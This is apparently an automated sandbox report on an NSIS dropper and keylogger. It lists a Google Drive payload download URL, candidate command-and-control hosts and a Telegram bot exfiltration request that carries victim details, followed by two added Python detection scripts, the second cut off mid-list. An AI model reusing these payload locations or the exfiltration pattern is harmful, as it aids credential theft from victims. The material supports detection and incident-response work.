Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 12:35:03 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: NDQ211216GM08.exe.bin.exe, Nonalined.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBjr
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjr
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/9A
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/qA
Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254525150.0000000004090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D
Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0DRMmf
Source: Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download
Source: Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download_
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBjr
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056A8
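The network indicators above form a fixed chain: the stage-2 download from Google Drive, a public-IP lookup against checkip.dyndns.org with a legacy MSIE 6.0 / Windows NT 5.2 User-Agent, an XML geolocation lookup of that IP on reallyfreegeoip.org, and a Telegram bot API sendMessage call carrying the collected data. The report's memory string shows the Telegram URL as a template with empty token and chat_id fields, so a detection should match on the path shape rather than on a specific token. The Python below is an added example written for this page, not Joe Sandbox or Snake Keylogger code. It runs over constructed tab-separated proxy log lines (assumed format: timestamp, client IP, method, URL, User-Agent) and scores each client by how much of the chain it walks; the Drive file id, the User-Agent, the reallyfreegeoip path and the Telegram path shape are taken from the report, while the bot token, chat_id and second client in the sample are placeholders.

```python
"""Flag the beacon chain this report records (public-IP lookup with a legacy
User-Agent, reallyfreegeoip.org geolocation, Telegram bot API exfiltration)
in tab-separated HTTP proxy log lines. Added example, not Joe Sandbox code.
Assumed log format (constructed): timestamp, client IP, method, URL, User-Agent."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicators copied from the report's network section.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
STAGE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
TELEGRAM_BOT_RE = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)")


def parse_line(line):
    """Split one proxy record into its fields; raises ValueError on a malformed line."""
    ts, client, method, url, ua = line.rstrip("\n").split("\t", 4)
    u = urlsplit(url)
    return {"ts": ts, "client": client, "method": method, "host": u.hostname,
            "path": u.path, "query": parse_qs(u.query), "ua": ua}


def classify(req):
    """Map a request to a stage of the chain, or None if it matches nothing."""
    host, path, q = req["host"], req["path"], req["query"]
    if host in STAGE_HOSTS and "id" in q and q.get("export") == ["download"]:
        return "stage2_download"
    if host == "checkip.dyndns.org" and req["ua"] == LEGACY_UA:
        return "ip_check"  # plain checkip lookups are common; the UA is the discriminator
    if host == "reallyfreegeoip.org" and path.startswith("/xml/"):
        return "geolocation"
    if host == "api.telegram.org" and TELEGRAM_BOT_RE.match(path):
        return "telegram_exfil"
    return None


def redact_token(path):
    """Keep the bot token out of alerts and tickets: it is a live credential."""
    return TELEGRAM_BOT_RE.sub(lambda m: "/bot<redacted>/" + m.group("method"), path)


def score_clients(lines):
    """Return {client: (verdict, stages in first-seen order, exfil notes)}."""
    stages, notes = defaultdict(list), defaultdict(list)
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        req = parse_line(line)
        kind = classify(req)
        if kind is None:
            continue
        if kind not in stages[req["client"]]:
            stages[req["client"]].append(kind)
        if kind == "telegram_exfil":
            chat = req["query"].get("chat_id", [""])[0] or "<empty>"
            notes[req["client"]].append(f"{req['ts']} {redact_token(req['path'])} chat_id={chat}")
    out = {}
    for client, seen in stages.items():
        if "telegram_exfil" in seen and ("ip_check" in seen or "geolocation" in seen):
            verdict = "high"      # fingerprinting followed by exfil: the full stealer chain
        elif len(seen) >= 2:
            verdict = "medium"
        else:
            verdict = "low"       # a single stage (e.g. a Drive download) is not enough alone
        out[client] = (verdict, seen, notes[client])
    return out


# Constructed sample log. The Telegram token and chat_id are placeholders, not real values.
SAMPLE_LOG = """\
# ts\tclient\tmethod\turl\tuser_agent
2025-03-13T12:34:50Z\t192.168.2.9\tGET\thttps://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D\tMozilla/5.0
2025-03-13T12:34:51Z\t192.168.2.9\tGET\thttps://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download\tMozilla/5.0
2025-03-13T12:34:58Z\t192.168.2.9\tGET\thttp://checkip.dyndns.org/\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
2025-03-13T12:34:59Z\t192.168.2.9\tGET\thttps://reallyfreegeoip.org/xml/8.46.123.189\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
2025-03-13T12:35:03Z\t192.168.2.9\tGET\thttps://api.telegram.org/bot0000000000:PLACEHOLDER/sendMessage?chat_id=0&text=PC%20Name%3A367706\tMozilla/5.0
2025-03-13T12:36:10Z\t192.168.2.20\tGET\thttp://checkip.dyndns.org/\tcurl/8.5.0
2025-03-13T12:36:11Z\t192.168.2.20\tGET\thttps://drive.google.com/uc?export=download&id=someSharedDoc\tMozilla/5.0
"""

if __name__ == "__main__":
    for client, (verdict, seen, exfil) in sorted(score_clients(SAMPLE_LOG.splitlines()).items()):
        print(client, verdict, "->".join(seen), *exfil, sep="  ")
```

The second client in the sample hits checkip.dyndns.org with curl and downloads a shared Drive file, and scores low; the legacy User-Agent and the sendMessage path shape are what separate the stealer from ordinary traffic. The token is redacted before it reaches an alert because anyone holding it can talk to the attacker's bot.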

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe Jump to dropped file
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 11_2_004034F7
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Windows\resources\websiders.ini Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
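The findings above are the host-side chain: powershell.exe writes Nonalined.exe into the user's Temp directory, the dropped file shares the original sample's NSIS entry point (including the AdjustTokenPrivileges and ExitWindowsEx path), and the sample writes an .ini under C:\Windows\resources. The Python below is an added example, not Joe Sandbox code, that correlates these three behaviours over constructed Sysmon-shaped events (EventID 11 FileCreate, EventID 1 ProcessCreate). The Header field holding the created file's first bytes is an assumption made for the example, since Sysmon FileCreate events carry no file content; in practice it comes from EDR telemetry or a hash lookup.

```python
"""Host-side correlation of the drop chain recorded in this report, over
Sysmon-shaped events (EventID 11 = FileCreate, EventID 1 = ProcessCreate).
Added example, not Joe Sandbox code. The 'Header' field (first bytes of the
created file) is an assumption for this example; real Sysmon FileCreate events
carry no content, so take it from EDR telemetry or a hash lookup."""

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_TEMP = "\\appdata\\local\\temp\\"
SYSTEM_DIR = "c:\\windows\\"


def is_pe(header):
    """Check the MZ magic, not the extension: droppers rename freely."""
    return header[:2] == b"MZ"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Walk events in order and return (rule, image, target) triples.

    Rules:
      script_host_drops_pe            a scripting host writes a PE under the user's Temp
      dropped_pe_executed             a file flagged by the rule above is later run
      user_process_writes_system_dir  a process outside C:\\Windows writes into it
    """
    dropped, findings = set(), []
    for ev in events:
        image = ev["Image"].lower()
        if ev["EventID"] == 11:
            target = ev["TargetFilename"].lower()
            if basename(image) in SCRIPT_HOSTS and USER_TEMP in target and is_pe(ev["Header"]):
                dropped.add(target)
                findings.append(("script_host_drops_pe", image, target))
            elif target.startswith(SYSTEM_DIR) and not image.startswith(SYSTEM_DIR):
                findings.append(("user_process_writes_system_dir", image, target))
        elif ev["EventID"] == 1 and image in dropped:
            findings.append(("dropped_pe_executed", image, ev["CommandLine"]))
    return findings


# Constructed events modelled on the paths in this report; Header values are made up.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\Nonalined.exe", "Header": b"MZ\x90\x00"},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe",
     "TargetFilename": r"C:\Windows\resources\websiders.ini", "Header": b"[Sec"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Temp\Nonalined.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\Nonalined.exe"'},
    # Benign noise: a system service writing its own cache, and a script host writing text.
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp",
     "Header": b"\x00\x01"},
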